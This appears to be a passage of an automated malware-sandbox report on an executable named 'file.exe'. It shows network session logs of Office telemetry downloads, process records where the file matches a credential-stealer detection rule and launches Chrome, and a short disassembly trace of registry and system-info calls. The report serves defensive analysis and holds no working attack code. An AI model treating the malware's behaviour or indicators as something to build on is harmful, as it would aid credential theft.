                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153223Z-174f7845968cdxdrhC1EWRg0en0000000x2g00000000d88u
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:23 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              145192.168.2.104987713.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:23 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:24 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:23 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1378
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BE584C214"
                                                                                                                                                                                                                                                              x-ms-request-id: 3f4920de-001e-00ad-8054-40554b000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153223Z-174f7845968j6t2phC1EWRcfe80000000x7000000000kgyw
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:24 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              146192.168.2.104987813.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:23 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:24 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:24 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1407
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BE687B46A"
                                                                                                                                                                                                                                                              x-ms-request-id: af6c4ed9-f01e-00aa-2a91-3f8521000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153224Z-174f7845968g6hv8hC1EWR1v2n000000050000000000kawq
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:24 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              147192.168.2.104988113.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:24 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:24 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:24 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1370
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BDE62E0AB"
                                                                                                                                                                                                                                                              x-ms-request-id: 81949a54-c01e-00a2-6633-402327000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153224Z-174f784596886s2bhC1EWR743w0000000x3000000000kmns
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:24 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              148192.168.2.104988413.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:24 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:24 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:24 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1397
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BE156D2EE"
                                                                                                                                                                                                                                                              x-ms-request-id: 581112ab-301e-0000-7391-3feecc000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153224Z-174f7845968n2hr8hC1EWR9cag0000000wrg00000000ghh0
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:24 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              149192.168.2.104989013.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:25 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:25 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:25 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1360
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BEDC8193E"
                                                                                                                                                                                                                                                              x-ms-request-id: 2a3ce4a2-301e-001f-2191-3faa3a000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153225Z-174f7845968glpgnhC1EWR7uec0000000x4g00000000ubgf
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:25 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                                                              Start time:10:31:16
                                                                                                                                                                                                                                                              Start date:27/11/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                                              Imagebase:0xbc0000
                                                                                                                                                                                                                                                              File size:1'871'360 bytes
                                                                                                                                                                                                                                                              MD5 hash:BC5D8C5F778DFF8422725D4AE10DD393
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1524310129.0000000000846000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                                                              Start time:10:32:08
                                                                                                                                                                                                                                                              Start date:27/11/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                                                              Imagebase:0x7ff6c5c30000
                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                              MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                                                              Start time:10:32:09
                                                                                                                                                                                                                                                              Start date:27/11/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1900,i,6270560810318321206,4862603060177102708,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                              Imagebase:0x7ff6c5c30000
                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                              MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                                                              Start time:10:32:11
                                                                                                                                                                                                                                                              Start date:27/11/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                                                              Imagebase:0x7ff6c5c30000
                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                              MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                                                              Start time:10:32:11
                                                                                                                                                                                                                                                              Start date:27/11/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2020 --field-trial-handle=1988,i,9570468939057985229,18284962801725825015,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                              Imagebase:0x7ff6c5c30000
                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                              MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                Execution Coverage:0.5%
                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                                Total number of Nodes:8
                                                                                                                                                                                                                                                                Total number of Limit Nodes:1
                                                                                                                                                                                                                                                                execution_graph 2551 61e3f6a 2552 61e4240 2551->2552 2553 61e500f RegOpenKeyA 2552->2553 2554 61e5036 RegOpenKeyA 2552->2554 2553->2554 2555 61e502c 2553->2555 2556 61e5053 2554->2556 2555->2554 2557 61e5097 GetNativeSystemInfo 2556->2557 2558 61e50a2 2556->2558 2557->2558

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 0 61e3f6a-61e500d 5 61e500f-61e502a RegOpenKeyA 0->5 6 61e5036-61e5051 RegOpenKeyA 0->6 5->6 7 61e502c 5->7 8 61e5069-61e5095 6->8 9 61e5053-61e505d 6->9 7->6 12 61e5097-61e50a0 GetNativeSystemInfo 8->12 13 61e50a2-61e50ac 8->13 9->8 12->13 14 61e50ae 13->14 15 61e50b8-61e50c6 13->15 14->15 17 61e50c8 15->17 18 61e50d2-61e50d9 15->18 17->18 19 61e50df-61e50e6 18->19 20 61e50ec 18->20 19->20 21 61e5f32-61e5f39 19->21 20->21 22 61e74ce-61e78ed 21->22 23 61e5f3f-61e5f45 21->23 23->22
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegOpenKeyA.ADVAPI32(80000001,91B30C49,91B3098B), ref: 061E5022
                                                                                                                                                                                                                                                                • RegOpenKeyA.ADVAPI32(80000002,91B3076C,91B3098B), ref: 061E5049
                                                                                                                                                                                                                                                                • GetNativeSystemInfo.KERNEL32(91B30B8B), ref: 061E50A0
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1852726936.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.1852586898.0000000006050000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.1852612854.0000000006052000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.1852648161.0000000006056000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.1852726936.000000000605A000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_6050000_file.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Open$InfoNativeSystem
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1247124224-0
                                                                                                                                                                                                                                                                • Opcode ID: 05751ca6d2c52a59d9057e51fb6bbc09d2dfe9144b558038c6cf0043e7563ab1
                                                                                                                                                                                                                                                                • Instruction ID: 6dac7364b22809e8526345b5ff62cfd123611741201777933834816c991fae00
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05751ca6d2c52a59d9057e51fb6bbc09d2dfe9144b558038c6cf0043e7563ab1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 645165B290450EDFEB14DF64D8446AE77E5FF04315F11092AED81C2A40EB768CA4CF9A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1852726936.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.1852586898.0000000006050000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.1852612854.0000000006052000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.1852648161.0000000006056000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.1852726936.000000000605A000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_6050000_file.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 1f5e29ba3f96f4f8e1422c6dfe227b31267c80204e8150a2da5e276732e0654d
                                                                                                                                                                                                                                                                • Instruction ID: 6037611fa10a3af65ab6a39e33e0c66360e651de9940772c96d7be1ef3a5d3ce
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f5e29ba3f96f4f8e1422c6dfe227b31267c80204e8150a2da5e276732e0654d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C081017295C7D15FD713CF7488A629ABFF0BE5720070986DEC1E08B5A3D324A056E782
                                                                                                                                                                                                                                                                Memory Dump Source
